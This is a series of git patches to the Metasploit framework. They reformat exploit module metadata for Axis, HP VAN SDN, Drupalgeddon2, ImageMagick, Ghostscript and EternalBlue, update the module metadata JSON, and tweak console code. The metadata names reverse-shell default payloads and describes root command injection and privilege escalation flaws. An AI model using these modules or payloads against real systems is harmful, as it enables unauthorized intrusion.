"PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)" ], - "mod_time": "2017-09-13 22:03:34 +0000", + "mod_time": "2018-10-05 02:10:42 +0000", "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb", "is_install_path": true, "ref_name": "windows/fileformat/beetel_netconfig_ini_bof", From 7bc98e0ea822e9936a54bfcac40f3f3267b1c422 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 5 Oct 2018 03:00:40 -0500 Subject: [PATCH 181/192] Fix formatting and convert a missed AKA reference --- .../scanner/http/apache_mod_cgi_bash_env.rb | 5 +- .../linux/http/axis_srv_parhand_rce.rb | 56 +++++------ .../linux/http/hp_van_sdn_cmd_inject.rb | 42 ++++---- .../fileformat/ghostscript_failed_restore.rb | 20 ++-- .../unix/fileformat/imagemagick_delegate.rb | 6 +- .../unix/webapp/drupal_drupalgeddon2.rb | 98 +++++++++---------- .../windows/smb/ms17_010_eternalblue_win8.py | 2 +- 7 files changed, 110 insertions(+), 119 deletions(-) diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 6df8e11fa4..4e17c90277 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -40,10 +40,7 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Sep 24 2014', 'License' => MSF_LICENSE, - 'Notes' => - { - 'AKA' => ['Shellshock'] - } + 'Notes' => {'AKA' => ['Shellshock']} )) register_options([ diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index bbd7aa9ab0..10caf872b8 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -12,12 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Axis Network Camera .srv to parhand RCE', - 'Description' => %q{ + 'Name' => 'Axis Network Camera .srv to parhand RCE', + 'Description' => %q{ This module exploits an auth bypass in .srv functionality and a command injection in parhand to execute code as the root user. }, - 'Author' => [ + 'Author' => [ 'Or Peles', # Vulnerability discovery (VDOO) 'wvu', # Metasploit module 'sinn3r', # Metasploit module @@ -28,46 +28,46 @@ class MetasploitModule < Msf::Exploit::Remote 'Chris Lee', # Metasploit module 'Cale Black' # Metasploit module ], - 'References' => [ + 'References' => [ ['CVE', '2018-10660'], ['CVE', '2018-10661'], ['CVE', '2018-10662'], ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'], ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf'] ], - 'DisclosureDate' => 'Jun 18 2018', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_ARMLE], - 'Privileged' => true, - 'Targets' => [ + 'DisclosureDate' => 'Jun 18 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_ARMLE], + 'Privileged' => true, + 'Targets' => [ ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => { - 'BadChars' => ' ', - 'Encoder' => 'cmd/ifs', - 'Compat' => { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'netcat-e' + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'BadChars' => ' ', + 'Encoder' => 'cmd/ifs', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat-e' } }, - 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' } ], ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'Type' => :linux_dropper, - 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' } ] ], - 'DefaultTarget' => 1, - 'DefaultOptions' => {'WfsDelay' => 10} + 'DefaultTarget' => 1, + 'DefaultOptions' => {'WfsDelay' => 10} )) end diff --git a/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb b/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb index f554cc5753..beb2735f90 100644 --- a/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb +++ b/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb @@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'HP VAN SDN Controller Root Command Injection', - 'Description' => %q{ + 'Name' => 'HP VAN SDN Controller Root Command Injection', + 'Description' => %q{ This module exploits a hardcoded service token or default credentials in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root. @@ -27,36 +27,36 @@ class MetasploitModule < Msf::Exploit::Remote If the service token option TOKEN is blank, USERNAME and PASSWORD will be used for authentication. An additional login request will be sent. }, - 'Author' => [ + 'Author' => [ 'Matt Bergin', # Vulnerability discovery and Python exploit 'wvu' # Metasploit module and additional ~research~ ], - 'References' => [ + 'References' => [ ['EDB', '44951'], ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt'] ], - 'DisclosureDate' => 'Jun 25 2018', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], - 'Privileged' => true, - 'Targets' => [ + 'DisclosureDate' => 'Jun 25 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Privileged' => true, + 'Targets' => [ ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => {'BadChars' => ' '}, - 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'} + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => {'BadChars' => ' '}, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'} ], ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :linux_dropper, - 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'} + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'} ] ], - 'DefaultTarget' => 0, - 'DefaultOptions' => {'RPORT' => 8081, 'SSL' => true} + 'DefaultTarget' => 0, + 'DefaultOptions' => {'RPORT' => 8081, 'SSL' => true} )) register_options([ diff --git a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb index 3e3ffcdd13..df9f35e139 100644 --- a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb +++ b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb @@ -45,20 +45,20 @@ class MetasploitModule < Msf::Exploit 'Privileged' => false, 'Targets' => [ ['Unix (In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => {'Space' => 4089, 'DisableNops' => true} # 4096 total + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => {'Space' => 4089, 'DisableNops' => true} # 4096 total ], ['PowerShell (In-Memory)', - 'Platform' => 'win', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :psh_memory + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :psh_memory ], ['Linux (Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper ] ], 'DefaultTarget' => 0 diff --git a/modules/exploits/unix/fileformat/imagemagick_delegate.rb b/modules/exploits/unix/fileformat/imagemagick_delegate.rb index 735b899458..f1319594e6 100644 --- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb +++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb @@ -47,8 +47,7 @@ class MetasploitModule < Msf::Exploit %w{URL https://seclists.org/oss-sec/2016/q3/682}, %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab}, %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}, - %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}, - %w{AKA ImageTragick} + %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669} ], 'DisclosureDate' => 'May 3 2016', 'License' => MSF_LICENSE, @@ -63,7 +62,8 @@ class MetasploitModule < Msf::Exploit ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg ['PS file', template: 'msf.ps'] # PoC from taviso ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Notes' => {'AKA' => ['ImageTragick']} )) register_options([ diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 7aa30b2488..aa5dd2461a 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'], ['URL', 'https://github.com/a2u/CVE-2018-7600'], ['URL', 'https://github.com/nixawk/labs/issues/19'], - ['URL', 'https://github.com/FireFart/CVE-2018-7600'], + ['URL', 'https://github.com/FireFart/CVE-2018-7600'] ], 'DisclosureDate' => 'Mar 28 2018', 'License' => MSF_LICENSE, @@ -47,89 +47,83 @@ class MetasploitModule < Msf::Exploit::Remote # Automatic targets (PHP, cmd/unix, native) # ['Automatic (PHP In-Memory)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Type' => :php_memory + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Type' => :php_memory ], ['Automatic (PHP Dropper)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Type' => :php_dropper + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Type' => :php_dropper ], ['Automatic (Unix In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory ], ['Automatic (Linux Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper ], # # Drupal 7.x targets (PHP, cmd/unix, native) # ['Drupal 7.x (PHP In-Memory)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7'), - 'Type' => :php_memory + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('7'), + 'Type' => :php_memory ], ['Drupal 7.x (PHP Dropper)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7'), - 'Type' => :php_dropper + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('7'), + 'Type' => :php_dropper ], ['Drupal 7.x (Unix In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('7'), - 'Type' => :unix_memory + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Version' => Gem::Version.new('7'), + 'Type' => :unix_memory ], ['Drupal 7.x (Linux Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('7'), - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Version' => Gem::Version.new('7'), + 'Type' => :linux_dropper ], # # Drupal 8.x targets (PHP, cmd/unix, native) # ['Drupal 8.x (PHP In-Memory)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8'), - 'Type' => :php_memory + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('8'), + 'Type' => :php_memory ], ['Drupal 8.x (PHP Dropper)', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8'), - 'Type' => :php_dropper + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Version' => Gem::Version.new('8'), + 'Type' => :php_dropper ], ['Drupal 8.x (Unix In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('8'), - 'Type' => :unix_memory + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Version' => Gem::Version.new('8'), + 'Type' => :unix_memory ], ['Drupal 8.x (Linux Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('8'), - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Version' => Gem::Version.new('8'), + 'Type' => :linux_dropper ] ], 'DefaultTarget' => 0, # Automatic (PHP In-Memory) 'DefaultOptions' => {'WfsDelay' => 2}, - 'Notes' => - { - 'AKA' => [ - 'SA-CORE-2018-002', - 'Drupalgeddon 2' - ] - } + 'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']} )) register_options([ diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py index c4bd48cbb9..a008d88346 100755 --- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py +++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py @@ -94,7 +94,7 @@ metadata = { 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''} }, 'notes': { - 'AKA': ['ETERNALBLUE'] + 'AKA': ['ETERNALBLUE'] } } From e22920dbedac642daa3632d8dd2ef8dfa8781c02 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 5 Oct 2018 01:40:33 -0700 Subject: [PATCH 182/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 20 +++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 17b942b3d6..5c3a15efbb 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -18597,7 +18597,7 @@ "https" ], "targets": null, - "mod_time": "2018-09-17 22:29:20 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb", "is_install_path": true, "ref_name": "scanner/http/apache_mod_cgi_bash_env", @@ -45795,7 +45795,7 @@ "Unix In-Memory", "Linux Dropper" ], - "mod_time": "2018-09-27 23:51:42 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/linux/http/axis_srv_parhand_rce.rb", "is_install_path": true, "ref_name": "linux/http/axis_srv_parhand_rce", @@ -48094,7 +48094,7 @@ "Unix In-Memory", "Linux Dropper" ], - "mod_time": "2018-08-24 18:08:15 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb", "is_install_path": true, "ref_name": "linux/http/hp_van_sdn_cmd_inject", @@ -58439,7 +58439,7 @@ "PowerShell (In-Memory)", "Linux (Dropper)" ], - "mod_time": "2018-09-15 18:54:45 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb", "is_install_path": true, "ref_name": "multi/fileformat/ghostscript_failed_restore", @@ -71929,8 +71929,7 @@ "URL-https://seclists.org/oss-sec/2016/q3/682", "URL-https://github.com/ImageMagick/ImageMagick/commit/06c41ab", "URL-https://github.com/ImageMagick/ImageMagick/commit/a347456", - "URL-http://permalink.gmane.org/gmane.comp.security.oss.general/19669", - "AKA-ImageTragick" + "URL-http://permalink.gmane.org/gmane.comp.security.oss.general/19669" ], "is_server": true, "is_client": false, @@ -71948,7 +71947,7 @@ "MVG file", "PS file" ], - "mod_time": "2018-09-15 18:54:45 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/unix/fileformat/imagemagick_delegate.rb", "is_install_path": true, "ref_name": "unix/fileformat/imagemagick_delegate", @@ -71956,6 +71955,9 @@ "post_auth": false, "default_credential": false, "notes": { + "AKA": [ + "ImageTragick" + ] } }, "exploit_unix/ftp/proftpd_133c_backdoor": { @@ -74471,7 +74473,7 @@ "Drupal 8.x (Unix In-Memory)", "Drupal 8.x (Linux Dropper)" ], - "mod_time": "2018-08-27 13:11:22 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "is_install_path": true, "ref_name": "unix/webapp/drupal_drupalgeddon2", @@ -123540,7 +123542,7 @@ "targets": [ "win x64" ], - "mod_time": "2018-08-27 16:06:07 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "is_install_path": true, "ref_name": "windows/smb/ms17_010_eternalblue_win8", From 3ec71ed5495683e8ebb743e00ecbd02cb9b7be7e Mon Sep 17 00:00:00 2001 From: Green-m Date: Fri, 5 Oct 2018 17:30:38 +0800 Subject: [PATCH 183/192] Fix issue that not interact with session. --- lib/msf/ui/console/command_dispatcher/exploit.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index 83dfe871ad..419fa79f9c 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -165,10 +165,10 @@ class Exploit end rhosts = mod.datastore['RHOSTS'] + rhosts_range = Rex::Socket::RangeWalker.new(rhosts) # For multiple targets exploit attempts. - if rhosts + if rhosts && rhosts_range.length.to_i > 1 opts[:multi] = true - rhosts_range = Rex::Socket::RangeWalker.new(rhosts) rhosts_range.each do |rhost| nmod = mod.replicant nmod.datastore['RHOST'] = rhost @@ -193,7 +193,7 @@ class Exploit any_session = true end end - # For single target. + # For single target or no rhosts option. else session = exploit_single(mod, opts) # If we were given a session, let's see what we can do with it From a35fdab4d7e0ccb94f6b2d5d4f19e2a48795dfea Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 5 Oct 2018 08:52:26 -0700 Subject: [PATCH 184/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 5c3a15efbb..ea609ab2a8 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -53129,7 +53129,7 @@ "King's Way", "Brendan Coles" ], - "description": "This module attempts to gain root privileges on Deepin Linux systems\n by using lastore-daemon to install a package.\n\n The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any\n user in the sudo group to install arbitrary system packages without\n providing a password, resulting in code execution as root. By default,\n the first user created on the system is a member of the sudo group.\n\n This module has been tested successfully with lastore-daemon version\n 0.9.53-1 on Deepin Linux 15.5 (x64).", + "description": "This module attempts to gain root privileges on Deepin Linux systems\n by using lastore-daemon to install a package.\n\n The lastore-daemon D-Bus configuration on Deepin Linux permits any\n user in the sudo group to install arbitrary system packages without\n providing a password, resulting in code execution as root. By default,\n the first user created on the system is a member of the sudo group.\n\n This module has been tested successfully with lastore-daemon versions\n 0.9.53-1 on Deepin Linux 15.5 (x64); and\n 0.9.66-1 on Deepin Linux 15.7 (x64).", "references": [ "EDB-39433", "URL-https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8" @@ -53148,7 +53148,7 @@ "targets": [ "Auto" ], - "mod_time": "2018-03-24 23:16:42 +0000", + "mod_time": "2018-10-04 21:13:21 +0000", "path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb", "is_install_path": true, "ref_name": "linux/local/lastore_daemon_dbus_priv_esc", From 05ac3875bcb02c66c0e0d586447eb458e8f46a51 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 5 Oct 2018 11:30:45 -0500 Subject: [PATCH 185/192] Improve check_snake_case_filename check in msftidy We also remove the separator, since the file is basenamed. --- tools/dev/msftidy.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index e469d7d9ea..15cc049efa 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -254,11 +254,11 @@ class Msftidy line =~ /^\s*(require|load)\s+['"]#{lib}['"]/ end + # This check also enforces namespace module name reversibility def check_snake_case_filename - sep = File::SEPARATOR - good_name = Regexp.new "^[a-z0-9_#{sep}]+\.rb$" - unless @name =~ good_name - warn "Filenames should be alphanum and snake case." + # TODO: Can we add the __ check to the look{ahead,behind}? + if @name !~ /^(?!_)[a-z0-9_]+(? Date: Fri, 5 Oct 2018 13:24:45 -0500 Subject: [PATCH 186/192] Stop being an idiot about the regex and rewrite it There was no reason to shoehorn in zero-length assertions. --- tools/dev/msftidy.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 15cc049efa..9a0c19abe1 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -256,8 +256,7 @@ class Msftidy # This check also enforces namespace module name reversibility def check_snake_case_filename - # TODO: Can we add the __ check to the look{ahead,behind}? - if @name !~ /^(?!_)[a-z0-9_]+(? Date: Fri, 5 Oct 2018 14:00:31 -0500 Subject: [PATCH 187/192] Bump fallback pager in log command to tail -n 50 24 is never enough. Unless you're Jack Bauer. (The 24 comes from the VT100. :) --- .../ui/console/command_dispatcher/developer.rb | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 7e64665258..09779c2c4e 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -28,11 +28,17 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def local_editor - framework.datastore['LocalEditor'] || Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') + framework.datastore['LocalEditor'] || + Rex::Compat.getenv('VISUAL') || + Rex::Compat.getenv('EDITOR') || + Msf::Util::Helper.which('vim') end def local_pager - framework.datastore['LocalPager'] || Rex::Compat.getenv('PAGER') || Rex::Compat.getenv('MANPAGER') + framework.datastore['LocalPager'] || + Rex::Compat.getenv('PAGER') || + Rex::Compat.getenv('MANPAGER') || + Msf::Util::Helper.which('less') end # XXX: This will try to reload *any* .rb and break on modules @@ -199,7 +205,8 @@ class Msf::Ui::Console::CommandDispatcher::Developer editor = local_editor unless editor - editor = 'vim' + # ed(1) is the standard editor + editor = 'ed' print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.") end @@ -283,7 +290,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer pager = local_pager.to_s.include?('less') ? "#{local_pager} +G" : local_pager unless pager - pager = 'tail -n 24' + pager = 'tail -n 50' print_warning("LocalPager or $PAGER/$MANPAGER should be set. Falling back on #{pager}.") end From 938139d23c6a95f7dff66ad94e0d6b417977cc5c Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 5 Oct 2018 14:19:32 -0500 Subject: [PATCH 188/192] Add vi and more for hysterical raisins --- lib/msf/ui/console/command_dispatcher/developer.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 09779c2c4e..2be16f0fdb 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -31,14 +31,16 @@ class Msf::Ui::Console::CommandDispatcher::Developer framework.datastore['LocalEditor'] || Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') || - Msf::Util::Helper.which('vim') + Msf::Util::Helper.which('vim') || + Msf::Util::Helper.which('vi') end def local_pager framework.datastore['LocalPager'] || Rex::Compat.getenv('PAGER') || Rex::Compat.getenv('MANPAGER') || - Msf::Util::Helper.which('less') + Msf::Util::Helper.which('less') || + Msf::Util::Helper.which('more') end # XXX: This will try to reload *any* .rb and break on modules From 6efadb5f2d1a160871eca3bf29d5fc28d9c3f1d4 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 5 Oct 2018 16:03:09 -0500 Subject: [PATCH 189/192] Further clarify {AUDIO,PHYSICAL}_EFFECTS --- lib/msf/core/constants.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index 4ef3cbb7ff..cca6b564cb 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -82,9 +82,9 @@ IOC_IN_LOGS = 'ioc-in-logs' ACCOUNT_LOCKOUTS = 'account-lockouts' # Module may show something on the screen (Example: a window pops up) SCREEN_EFFECTS = 'screen-effects' -# Module may output audio from the speakers (Example: the app plays music) +# Module may cause a noise (Examples: audio output from the speakers or hardware beeps) AUDIO_EFFECTS = 'audio-effects' -# Module may produce physical effects (Example: the device moves) +# Module may produce physical effects (Examples: the device makes movement or flashes LEDs) PHYSICAL_EFFECTS = 'physical-effects' # From 6029ce2560eeda73aadb0fc49efb462fd27dafb8 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 5 Oct 2018 14:28:59 -0700 Subject: [PATCH 190/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index ea609ab2a8..a981e29ed5 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -51688,22 +51688,27 @@ "notes": { } }, - "exploit_linux/http/ueb9_api_storage": { - "name": "Unitrends UEB 9 http api/storage remote root", - "full_name": "exploit/linux/http/ueb9_api_storage", + "exploit_linux/http/ueb_api_rce": { + "name": "Unitrends UEB http api remote code execution", + "full_name": "exploit/linux/http/ueb_api_rce", "rank": 600, "disclosure_date": "2017-08-08", "type": "exploit", "author": [ "Cale Smith", "Benny Husted", - "Jared Arave" + "Jared Arave", + "h00die" ], - "description": "It was discovered that the api/storage web interface in Unitrends Backup (UB)\n before 10.0.0 has an issue in which one of its input parameters was not validated.\n A remote attacker could use this flaw to bypass authentication and execute arbitrary\n commands with root privilege on the target system.", + "description": "It was discovered that the api/storage web interface in Unitrends Backup (UB)\n before 10.0.0 has an issue in which one of its input parameters was not validated.\n A remote attacker could use this flaw to bypass authentication and execute arbitrary\n commands with root privilege on the target system.\n UEB v9 runs the api under root privileges and api/storage is vulnerable.\n UEB v10 runs the api under limited privileges and api/hosts is vulnerable.", "references": [ "URL-https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756", + "URL-https://support.unitrends.com/UnitrendsBackup/s/article/000006002", "URL-https://nvd.nist.gov/vuln/detail/CVE-2017-12478", - "CVE-2017-12478" + "URL-http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html", + "EDB-44297", + "CVE-2017-12478", + "CVE-2018-6328" ], "is_server": false, "is_client": false, @@ -51726,13 +51731,14 @@ "https" ], "targets": [ - "UEB 9.*" + "UEB 9.*", + "UEB < 10.1.0" ], - "mod_time": "2017-10-20 19:59:24 +0000", - "path": "/modules/exploits/linux/http/ueb9_api_storage.rb", + "mod_time": "2018-09-11 05:24:01 +0000", + "path": "/modules/exploits/linux/http/ueb_api_rce.rb", "is_install_path": true, - "ref_name": "linux/http/ueb9_api_storage", - "check": false, + "ref_name": "linux/http/ueb_api_rce", + "check": true, "post_auth": false, "default_credential": false, "notes": { From 89b6aafd857499674c185104cff898f6cff4f65d Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 6 Oct 2018 04:37:04 +0000 Subject: [PATCH 191/192] Use register_file_for_cleanup --- .../exploits/qnx/local/ifwatchd_priv_esc.rb | 35 +++++++++---------- 1 file changed, 16 insertions(+), 19 deletions(-) diff --git a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb index d645273fe2..df457c226d 100644 --- a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb +++ b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb @@ -6,6 +6,7 @@ class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking + include Msf::Post::Linux::Priv include Msf::Post::File include Msf::Exploit::FileDropper @@ -61,15 +62,19 @@ class MetasploitModule < Msf::Exploit::Local 'PAYLOAD' => 